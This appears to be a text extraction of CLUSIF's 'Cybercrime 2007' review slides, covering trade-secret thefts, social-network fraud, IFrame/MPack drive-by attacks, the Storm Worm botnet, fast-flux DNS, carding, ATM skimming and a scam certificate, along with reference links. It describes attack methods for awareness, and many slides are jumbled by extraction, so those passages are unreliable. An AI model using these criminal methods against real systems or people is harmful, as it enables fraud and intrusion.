4th case: Theft of trade secrets at Duracell
The case was ruled on in 2007. A former Duracell employee, Edward Grande, pleaded guilty in February 2007 for the theft of trade secrets and was sentenced in May 2007. He was accused of having downloaded and copied onto his computer research documents on Duracell AA batteries when he was working at Duracell.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 73 Cybercrime 2007 Disrupt, destabilize
To take out these data, he sent them to himself to his personal e-mail address.
Then he attempted to sell this information on his own initiative to two rival companies that returned it to Duracell.
Edward Grande was sentenced in May 2007 to five years of probation, fined $7,500 and ordered to perform 200 hours of community service.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 74 Cybercrime 2007 Disrupt, destabilize Webography on the Formula 1 case http://www.fia.com/public/mclaren.pdf http://www.fia.com/mediacentre/Press_Releases/FIA_Sport/2007/ December/071207-01.html http://www.fia.com/mediacentre/Press_Releases/FIA_Sport/2007/ December/131207-01.html http://www.fia.com/public/Transcript_6-Dec_2007.pdf http://afp.google.com/article/ALeqM5go5VyWErN0MfqmPxllFahXu8 8-8w http://www.rtl.fr/info/article.asp?dicid=561466 http://www.lequipe.fr/Formule1/breves2007/20070913_193712De v.html http://www.01men.com/edito/f1-live-formule-1-racing-live- 071206200352/espionnage-mclaren-renault-fautif/ http://www.lequipe.fr/Formule1/breves2007/20070708_130452De v.html http://www.lastampa.it/sport/cmsSezioni/formula1/200709articoli /10565girata.asp http://observer.guardian.co.uk/sport/story/0,,2170261,00.html http://sport.guardian.co.uk/motorsport/story/0,,2168805,00.html
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 75 Cybercrime 2007 Disrupt, destabilize
Webography on the theft of DuPont trade secrets http://www.bis.doc.gov/news/2007/doj02_15_07.htm http://www.iht.com/articles/ap/2007/11/07/business/NA-FIN-US- DuPont-Trade-Secrets.php http://www.informationweek.com/news/showArticle.jhtml?articleID =202804057 http://www.delawareonline.com/apps/pbcs.dll/article?AID=/20071 107/NEWS/711070395
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 76 Cybercrime 2007 Disrupt, destabilize
Webography on the theft of Duracell trade secrets http://www.usdoj.gov/criminal/cybercrime/grandePlea.htm http://www.washingtonpost.com/wp- dyn/content/article/2007/02/02/AR2007020200906.html http://www.reuters.com/article/consumerproducts- SP/idUSN1848939920070518?sp=true http://weblog.infoworld.com/techwatch/archives/011958.html
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 77 Cybercrime 2007 Disrupt, destabilize
4) Social networking, opportunities for fraud
Social networking on the Internet allows individuals to enter into contact, share centers of interest, increase the number of contacts, meet others, communicate and make oneself known.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 78 Cybercrime 2007 Disrupt, destabilize
There are numerous social networking sites and many others are created all the time. The craze for these sites attracts many users, With numbers sometimes adding up to millions of registered users in certain social networks, many of whom are registered in more than one. Social networking can be classified by purpose: - Professional (examples: LinkedIn, Viadeo) - Reunion (exemples: Classmates, Copainsdavant, Trombi) - Photo sharing: Flickr
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 79 Cybercrime 2007 Disrupt, destabilize
-Sharing interests and hobbies (FaceBook), exhibiting one’s works (MySpace)
The difference between professional, reunion and interest/hobby networks tends to be blurred since certain social networking sites describe themselves as a combination of “business and hobbies” (MyCorners.com) or become multipurpose by gradually adding new elements.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 80 Cybercrime 2007 Disrupt, destabilize
The economic model of social networking sites varies: access is either free (Flickr), free for basic access and subscription-based for premium service (for example, to contact people directly on Copainsdavant, Trombi), or subscription-based where the users are left to decide on the price (6nergies.net), etc.
Most of these sites derive their resources from user subscriptions and advertising revenue.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 81 Cybercrime 2007 Disrupt, destabilize Users provide so much personal information that highly detailed profiles can be created on them without their realizing the potential risks of exploitation.
The security of these networks where personal and professional data are abundant have caused concerns. Certain events in 2007 demonstrated the pertinence of these concerns. Here are just a few examples:
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 82 Cybercrime 2007 Disrupt, destabilize Fraudulent access:
In June 2007, Facebook filed a suit against unknown persons for unlawfully attempting to access its computer system. A company in the pornography business is allegedly implicated in this case.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 83 Cybercrime 2007 Disrupt, destabilize
Personal data and private life in the line of sight: However, Facebook was also harshly criticized in 2007 for an excessively intrusive application. Its Beacon application would automatically send out information to friends on a user’s Internet purchases without giving the user the option of choosing which information could be broadcast.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 84 Cybercrime 2007 Disrupt, destabilize Imposture and bad encounters:
Although most social networking sites require users to provide genuine and accurate data, meeting people on these sites or elsewhere on the Internet involves the risk of imposture and bad encounters.
In 2007, a 13-year-old girl committed suicide in the United States after an online romance ended with a friend she made on MySpace. This friend, “Josh” was revealed to be a 47-year-old woman living nearby. She was not charged.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 85 Cybercrime 2007 Disrupt, destabilize
Infections:
In 2007, on decoy MySpace pages, users were advised to download a (fake) codec (decoding software) to be able to watch videos. If they did so, they were in fact redirected to a Web site downloading a Trojan horse. MySpace explained that the infected pages on its site were the result of phishing e-mails sent to Internauts.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 86 Cybercrime 2007 Disrupt, destabilize
In conclusion Computer security risks are high due to the substantial number of users. Individuals who often visit social networking sites do not always realize that they give out too much infomation about themselves. This overly personal information may one day turn against them. The network of professional contacts could make it difficult to manage discretion on (parts of) organization charts and projects. It may facilitate the process of Intelligence profiling.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 87 Cybercrime 2007 Disrupt, destabilize
Webography http://www.theregister.co.uk/2007/12/17/facebook_hack_ attack_lawsuit/ http://docs.justia.com/cases/federal/district- courts/california/candce/5:2007cv03404/193531/17/0.pdf http://www.juriscom.net/actu/visu.php?ID=1004 http://www.lemondeinformatique.fr/actualites/lire-top-10- de-2007-facebook-expose-tous-les-exces-des-reseaux- sociaux-24982.html http://www.csis.dk/dk/forside/LinkedIn.pdf http://www.viadeo.com/aide/cgv/ http://www.facebook.com/terms.php http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_pp _social_networks.pdf
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 88 Cybercrime 2007 Disrupt, destabilize
Webography (cont’d.) http://www.internetactu.net/2007/11/20/reseaux- sociaux-quand-les-utilisateurs-sen-fichent/ http://www.francesoir.fr/faits-divers/2007/12/01/elle- drague-une-ado-sur-le-web-et-cause-son-suicide.html http://www.01net.com/editorial/364586/la-page- myspace-d-alicia-keys-infectee-par-un-malware/ http://www.theregister.co.uk/2007/09/05/facebook_pub lic_access/ http://www.theregister.co.uk/2007/07/31/facebook/ http://www.lemondeinformatique.fr/actualites/lire-le- web-20-favoriserait-la-fuite-d-informations-22459.html
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 89 Cybercrime 2007 2007 Overview
�Sophistication of attacks
� Malicious intent on eBusiness � Credit card fraud via Internet � Scams via auction sites
� Notable events � “Cyberwar” in Estonia � “Chinese” cyberattacks � Security stakes for SCADA infrastructures
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 90 Cybercrime 2007 Agenda
iFraming, the Italian Job Mpack… Stormworm and botnet Fastflux “Questionable” activities - domain tasting, - Russian Business Network (RBN)…
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 91 Cybercrime 2007 Iframe: Definition
An IFRAME (Inline Frame) is a redirection code that can embed in another Web page a frame containing a local or remote HTML code. Among the attributes of the HTML element are: � src: the source of the content to be inserted in the frame; � name: the name of the frame to create links to it; � scrolling: a variable authorizing or denying scrolling in the window; � as well as all the options for managing the frame, such as its visibility, width, length, position in the page, margins, etc.
Example:Example:
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 92 Cybercrime 2007
IFRAME: Pagejacking
The preliminary phase of the attack involves searching for and infiltrating vulnerable sites. In a great number of cases, these sites use applications developed with PHP language.
Even if the IFRAME is “hidden”, it does its job by leading the user to the remote site page. If this site contains an exploit (or even just a script), it may be executed if the computer that activates it is vulnerable (or has loose security parameters).
Attacks have been numerous and efficient: ANI, MS06-044, MS06- 006, MS06-014, ActiveX bugs and other XML overflows.
Example:Example:
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 93 Cybercrime 2007 Hidden IFRAME, social networking sites
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 94 Cybercrime 2007 “Hidden” IFrames?
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 95 Cybercrime 2007 Spring 07: Italian Job/MPack
Premeditated attack: Between mid-April and mid-June, a significant number of Web servers were corrupted (likely due to a common flaw targeting Apache or IIS or an ISP configuration error).
In June, over 10,000 sites were affected including 80% in Italy. More than 80,000 computers were infected as a result.
Once users visit a decoy site, they are silently redirected to a Web hosting the PHP page of a tool known as MPack (iframe).
Various attacks exploiting security flaws of the victim’s browser are linked together (Firefox, IE, Opera, etc.).
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 96 Cybercrime 2007 Client-side attacks
Source: http://www.honeynet.org/papers/wek
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 97 Cybercrime 2007 Mpack
Commercial “hacking” tool Developed and maintained by a Russian group Between $700 and $1000, support included… Simple and efficient… (Collection of PHP scripts)
Source : securityfocus.org
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 98 Cybercrime 2007 Behind the IFrame: MPack Botnet, RockPhish, LegitimateLegitimate sites sites Before the Fast-Flux, mademade intointo DDoS, decoysdecoys attack Identity theft, 1. A malicious person with the … MPack kit configures it and MPackMPack C&C C&C centercenter implants in his/her Web server the PHP page that launches exploits and the various associated modules. 2. It infiltrates several servers and inserts decoy IFrame HTML tags that direct the user to the attack page. 3. MPack is configured to secretly drops several programs in any vulnerable machine that connects to it.
The first program is a decoy that will try to infiltrate Web pages that are accessible from the victim’s computer to infect them and extend the range of action of MPack. The other programs are generally implanters that will install malicious programs that the hacker wants to use (robot, backdoor, keylogger, PassWord Stealer, etc.). The tool is coupled with a MySQL base that allows the hacker to follow the progression of the attack.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 99 Cybercrime 2007 IFrame & MPack LegitimateLegitimate sites sites mademade intointo The attack decoysdecoys
1. The victim visits a legitimate site MPackMPack C&C C&C centercenter that has been made into a decoy… 2. And is silently redirected to the MPack host server 3. Depending on the browser, several vulnerabilities are tested. (2):(2): silentsilent Various malwares are downloaded redirectionredirection and executed. 4. The Web pages accessible from the victim’s computer are in turn (3):(3): exploitationexploitation made into decoys. (1):(1): connectionconnection with with a a legitimatelegitimate site site Botnet, RockPhish, Fast-Flux, DDoS, Identity theft, (4):(4): machinemachine (4):(4): htmlhtml infectioninfection … underunder control control
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 100 Cybercrime 2007 Behind the IFrame TheThe casecase ofof ItalyItaly (“Italian (“Italian Job”/MPack) Job”/MPack)
Source WebSense
Source Symantec
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 101 Cybercrime 2007 A recent version of MPack
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 102 Cybercrime 2007
Same technique, different tools
IcePack � Tool similar to MPack, uses the same exploits � Developed administration interface � Marketed for about $400 n404 � Used against the Bank of India site (August 31, 2007) NeoSploit � Used against the Monster.com site on November 19, 2007 (Eddie Bauer, GMAC Mortgage, BestBuy, Toyota Financial and Tri Counties Bank).
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 103 Cybercrime 2007 StormWorm
Several names: Storm Worm, Zhelatin, Peacomm First appearance in January 2007
Characteristics: � Targets Windows systems � Spreads by e-mail by inviting the user to connect to a site exploiting a flaw and offering attractive programs (social engineering) � Innovation: P2P control channel
Objective: Botnet, illegal activities, spam…
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 104 Cybercrime 2007
Classic botnet (IRC) BotMaster Command IRC C&C
Botnet Connection DNS Server
Exploit Vulnerable User DNS lookup
Bot download
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 105 Cybercrime 2007 StormWorm: P2P Botnet
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 106 Cybercrime 2007 Click-me… (many incentives to get infected…)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 107 Cybercrime 2007 P2P Network over OverNet/eDonkey
The dynamic growth of the network makes it difficult to control/block the botnet
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 108 Cybercrime 2007 Binary code analysis
Protected binary: 2 layers of encryption that vary with almost each binary
Detection of virtual machines and anti-sandbox protection
Multi-threaded code, programmed in C++: noticeable sophistication of the level of malware programmers � C++ clearly complicates the task of the reverser � Multithreading as well (mostly due to the Windows API) � Modular code (communication layer separated from the control layer)
The bot uses the Overnet P2P protocol, based on the Kademlia specification.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 109 Cybercrime 2007 Reverse proxy
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 110 Cybercrime 2007 Important characteristics
Botnet designers are becoming increasingly professional � Modular design � Distributed and resistant control channel, confused with a legitimate network � Botnet splitting: possibility of selling or renting pieces of the botnet using hash encrypting keys � Possibility of providing a turnkey service for spam by selling or renting access to control servers � Large variety of binaries: long and repetitive analysis, difficult to create signatures
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 111 Cybercrime 2007 The answer to botnets
A specific answer is destined for failure: � Binary signatures are impossible: new variations almost daily, single Web pages � End-to-end encryption of communications � Distributed control channel � Strong authentification for control channel � Polymorphic and effective code protection
A generic approach is necessary.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 112 Cybercrime 2007 Fast Flux
Multiple IP addresses assigned to a Fully Qualified Domain Name (FQDN, machine name and domain name)
Often associated with reverse proxies
Used for Cybercrime
Simple: “A” records (IP) from FQDN change constantly (very short TTL)
Double: “A” and “NS” (Name Server) records change constantly
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 113 Cybercrime 2007
High availability Authority for spam.net zone Regular update of spam.net records Local IP no.1, IP no.2, etc. DNS BotMaster IP request for www.spam.net IP response no.x (TTL=0) r te 2 s . a o n m t IP o d b n o a Infected t s .1 Web Request d o r n o www.spam.net c IP e h R t IP Response no.2 IP Response no.1 i w
User
IP n°1 IP n°2
Infected PC Infected PC Proxy 1 Proxy 2 CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 114 Cybercrime 2007 Authority for High availability spam.net zone
Regular update of dns spam.net records Local (ns 1; ns 2 IP no.1, IP n.2, etc. DNS IP request for spam.net BotMaster IP response (TTL=0)
NS 2 f D xy o ro es , p at 1 r d xy e 2 Up ro t . p s o IP a n m P t I o d b n o a t Infected s .1 Infected PC– NS 1 d o r n o c P Web Request e I R h it
www.spam.net w IP response no.2 IP response no.1 Infected PC– NS 2
User
IP n°1 IP n°2
Infected PC Infected PC Proxy 1 Proxy 2 CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 115 Cybercrime 2007 Fast Flux example thebestcasinosonly.org A Records Class B Diversity NS Servers TTL Values
Source : Honeynet project - http://www.honeynet.org/
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 116 Cybercrime 2007 Fast Flux example thebestcasinosonly.org IPs mapped to
287 IP Addresses Source : Honeynet project - http://www.honeynet.org/ 60 Different AS #’s
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 117 Cybercrime 2007 Domain tasting
Billing of DNS domains after 5 days (registrar) � Pratice that initially enabled management of “errors” (typos, etc.)
Frequent abuse of this practice � Use of “domain tasting” to have several free domain names (spamming, phishing, etc.)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 118 Cybercrime 2007 Some statistics
Source: Icann, Nick Ashton-Hart
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 119 Cybercrime 2007 Organized crime still active
The Russian Business Network (RBN)
The Russian ISP, based in St. Petersburg… … known for its questionable activities
� According to Wikipedia: Pornography, counterfeiting, malware and phishing…
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 120 Cybercrime 2007 Russian Business Network October 2007: An empire…
11 millionmillion sites,sites, severalseveral million million IPIP Several sites selling fake security products (anti-virus, anti-spyware, addressesaddresses available available and and 44 millionmillion visitorsvisitors codecs). aa month.month. Sites selling malware, specialized forums (contacts, sales, purchases). Sites offering money for questionable activities (iFramer) Several decoy sites sent by IFrames (with exploits, MPack), mirror sites (RockPhish), relay sites for self- replicating malware (W32/Nuwar), etc. Collector (phishing) and administrator (botnet) sites. Adult sites (XXX) and child pornography sites.
SourceSource VerisignVerisign
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 121 Cybercrime 2007 RBN… and stormworm 2008…
Domain Name: � MERRYCHRISTMASDUDE.COM - Creation Date: Nov 27 2007 � UHAVEPOSTCARD.COM - Creation Date: Dec 23 2007 � HAPPYCARDS2008.COM - Creation Date: Dec 26 2007 Registered by � “ANO REGIONAL NETWORK INFORMATION CENTER DBA RU (Russia)”
Source : rbnexploit.blogspot.com
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 122 Cybercrime 2007 Webography
MPack, the italian job http://www.vnunet.fr/fr/news/2007/06/20/l-attaque-italian-job-se-r-pand Another malware pulls an Italian job http://blog.trendmicro.com/another-malware-pulls-an-italian-job/ Alerte Websense : MPack http://www.websense.com/securitylabs/alerts/alert.php?AlertID=782 Italy Under Attack: Mpack Gang Strikes Again! http://www.symantec.com/enterprise/security_response/weblog/2007/06/italy_under_attack_mpa ck_gang.html Know your Enemy: Fast-flux Service Networks http://www.honeynet.org/papers/ff/ Know your Enemy: Malicious Web Servers http://www.honeynet.org/papers/mws/ Exposing Stormworm http://noh.ucsd.edu/~bmenrigh/exposing_storm.ppt Russian Business Network http://rbnexploit.blogspot.com/ Russian Business Network study (David Bizeul) http://www.bizeul.org/files/RBN_study.pdf Security Intelligence Webcast Replays - Uncovering Online Fraud Rings: The Russian Business Network - Cyber Espionage: China and the Network Crack Program Hacker Group http://www.verisign.com/security-intelligence-service/info-center/webcasts/archived/index.html Analyse CERT-IST – Bilan 2007 http://www.cert-ist.com
Acknowledgments: François Paget, McAfee and Eric Edelstein, Orange for providing information and materials
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 123 Cybercrime 2007 2007 Overview
�Sophistication of attacks
� Malicious intent on eBusiness � Credit card fraud via Internet � Scams via auction sites
� Notable events � “Cyberwar” in Estonia � “Chinese” cyberattacks � Security stakes for SCADA infrastructures
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 124 Cybercrime 2007
The most obvious signs of cybercrime: carding, skimming, Internet scams
Fabien LANG Deputy chief of the OCLCTIC National Criminal Investigation Directorate
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 125 Carding: a globalized market for thieves Cybercrime 2007
Bank card vocabulary
TYPESTYPES
NUMBERNUMBER CARDCARD HOLDERHOLDER VALIDITYVALIDITY CRYPTOGRAMCRYPTOGRAM
DUMPDUMP CVV2CVV2 BINBIN
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 127 Cybercrime 2007
Coding (Carders) � Automatic number generator � Data bank hacking � Spyware & Trojan horses Definition Vending (Venders) Generally,Generally, itit refers refers to to bankbank � Purchase and resale of: cardcard fraud fraud using using various various � Credit card numbers material,material, softwaresoftware oror subversivesubversive meansmeans to to obtainobtain � Magnetic strips andand resellresell bank bank card card data, data, withwith the the intentintent to to makemake � Cardholder information fraudulent purchases at fraudulent purchases at � Cryptograms thethe expenseexpense of of thethe legallegal cardholder.cardholder. Cashing (Cashers) = swindling and money 33 stages:stages: laundering circuits •• Coding:Coding: datadata thefttheft � Real purchases (Internet, by phone, in •• Vending:Vending: resaleresale ofof datadata stores…) •• Cashing:Cashing: financialfinancial � Generate virtual purchase transactions transactionstransactions � Cash withdrawals and financial transactions
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 128 Cybercrime 2007
CASHING � or swindling and � Set up of virtual companies to sell laundering circuit false products for real money � Purchases of goods and products AllAll thethe methodsmethods usedused to to collectcollect in genuine on-line stores moneymoney fromfrom � Purchases of goods and products accounts,accounts, useuse andand in physical stores launderlaunder the the transferredtransferred � amounts.amounts. � Western Union
UseUse ofof financialfinancial � Egold meansmeans to to paypay off off supplierssuppliers of of bankbank data.data. � Webmoney
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 129 Cybercrime 2007 Illustration
•Card System case in the USA in 2005: 70,000 numbers stolen and used •TJX case in the USA in 2007: 45 million numbers stolen
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 130 Cybercrime 2007 Illustration
•Identification of French citizens indulging in the business of credit card numbers in 2007 •Ties established with other individuals in Canada, the United Kingdom, Russia and the USA
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 131 Cybercrime 2007
•Sale of numbers on confidential forums •Use of alternative means of payment: Western Union, E-Gold and Web Money •Losses due to activities of the French individuals estimated at $2 million
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 132 Cybercrime 2007 Skimming: a European-scale crime
•Crime essentially committed from East Europe •Appearance of groups from French suburbs •Hierarchized and structured groups
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 133 Cybercrime 2007 ATM tampering
Skimmer MagneticMagnetic stripstrip
False keypad Confidential code Confidential code Video system
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 134 Cybercrime 2007
2 micro-cameras
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 135 Cybercrime 2007
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 136 Cybercrime 2007
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 137 Cybercrime 2007
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 138 Cybercrime 2007 Internet scams: the reign of mystification
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 139 Cybercrime 2007 Internet scams
•An increasingly common trend •Prevention is essential •New stakes for international cooperation
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 140 Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation CertificatC BILLE RGATEST IFondationFI C CertificatAT BILL G GATESAG FondationNA N CertificatT BILLBI GATESLL Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation G CertificatAT EBILLS GATESF FondationOU N CertificatDA TBILLI GATESON Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certifions Certificat BILLque, GATESla somme Fondation de Cinquant Certificate Mille BILL Euro GATES (50.000) Fondation attribué Certificat à BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILLMR GATES BONNEFOI Fondation JEAN Certificat YVES, BILL Gagnant GATES deFondation la loterie Certificat internationale BILL GATES ‘ VIVE Fondation L’ENFANCE Certificat ‘ BILLde GATES Fondation l’Organisme Certificat BILL COMPASSION GATES Fondation INTERNATIONALE, Certificat BILL GATES est Fondation une donation Certificat de LA BILL BILL GATES GATES Fondation Certificat BILL GATESFOUNDATION. Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation LE Certificat CONTEXTE BILL GATES IMPLIQUE Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat(1) QUE BILL LESDITS GATES Fondation FONDS NE Certificat PROVIENNENT BILL GATES FondationPAS DU FAIT Certificat DE BILL LA VENTEGATES Fondation DE Certificat BILL GATES FondationDROGUES Certificat DURES BILL GATES : C'EST-A-DIRE Fondation Certificat COCAINE, BILL HEROINE,GATES Fondation OPIUM Certificat OU D’AUTRES BILL GATES Fondation Certificat BILL GATESDROGUES Fondation (MEDICAMENTS) Certificat BILL GATES LIEES. Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL (2)GATES LES Fondation FONDS MENTIONNESCertificat BILL GATES CI-DESSUS Fondation NE Certificat SONT BILLISSUS GATES D’UN Fondation Certificat BILL GATES Fondation CertificatBLANCHISSEMENT BILL GATES Fondation D’ARGENT Certificat BILL OU GATES PEUVENT Fondation ETRE Certificat COMME BILL ISSUE GATES D’UN Fondation Certificat BILL GATES FondationSABOTAGE Certificat ECONOMIQUE. BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Par Certificat conséquent, BILL GATES MAITRE Fondation BOHUI Certificat ADRIEN BILL principal GATES Fondationde l’ÉTUDE Certificat JURIDIQUE BILL GATES DE FondationMAITRE Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILLBOHUI GATES ADRIEN Fondation à Abidjan Certificat reconnais BILL GATES MR Fondation BONNEFOI Certificat JEAN BILL YVES, GATES comme Fondation bénéficiaire Certificat BILL GATES Fondation avantageux Certificat BILL de cesGATES fonds Fondation d’une valeur Certificat de CinquanteBILL GATES Mille Fondation Euros (50.000Certificat euros)BILL GATES et déclare Fondation par la Certificat BILL GATESprésente Fondation que les Certificat informations BILL GATES mentionnées Fondation ci-dessus Certificat sont BILL correctes GATES Fondation et ceci dans Certificat le respect BILL des GATES Fondation Certificat BILLrègles GATES en vigueurs. Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILLL’Etude GATES Juridique Fondation de Maître Certificat BOHUI BILL GATES ADRIEN Fondation se tient Certificat responsable BILL GATESde l’exactitude Fondation des Certificat BILL GATES Fondation informations Certificat BILL ci–dessus GATES Fondation mentionnées. Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILL GATES Fondation Certificat BILLCe Certificat GATES Fondation est signé Certificatconjointement BILL GATES par LA Fondation BILL GATES Certificat FOUNDATION BILL 